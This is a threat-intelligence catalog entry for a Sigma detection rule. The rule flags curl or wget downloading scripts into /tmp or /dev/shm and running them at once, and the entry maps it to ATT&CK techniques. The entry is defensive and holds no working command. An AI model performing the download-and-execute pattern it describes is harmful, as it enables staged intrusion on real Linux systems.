Skip to content

Hide Navigation Hide TOC

Suspicious Download and Execute Pattern via Curl/Wget (a2d9e2f3-0f43-4c7a-bcd9-9acfc0d723aa)

Detects suspicious use of command-line tools such as curl or wget to download remote content - particularly scripts - into temporary directories (e.g., /dev/shm, /tmp), followed by immediate execution, indicating potential malicious activity. This pattern is commonly used by malicious scripts, stagers, or downloaders in fileless or multi-stage Linux attacks.

Cluster A Galaxy A Cluster B Galaxy B Level
Suspicious Download and Execute Pattern via Curl/Wget (a2d9e2f3-0f43-4c7a-bcd9-9acfc0d723aa) Sigma-Rules Unix Shell - T1059.004 (a9d4b653-6915-42af-98b2-5758c4ceee56) Attack Pattern 1
Suspicious Download and Execute Pattern via Curl/Wget (a2d9e2f3-0f43-4c7a-bcd9-9acfc0d723aa) Sigma-Rules Exploitation for Client Execution - T1203 (be2dcee9-a7a7-4e38-afd6-21b31ecc3d63) Attack Pattern 1
Unix Shell - T1059.004 (a9d4b653-6915-42af-98b2-5758c4ceee56) Attack Pattern Command and Scripting Interpreter - T1059 (7385dfaf-6886-4229-9ecd-6fd678040830) Attack Pattern 2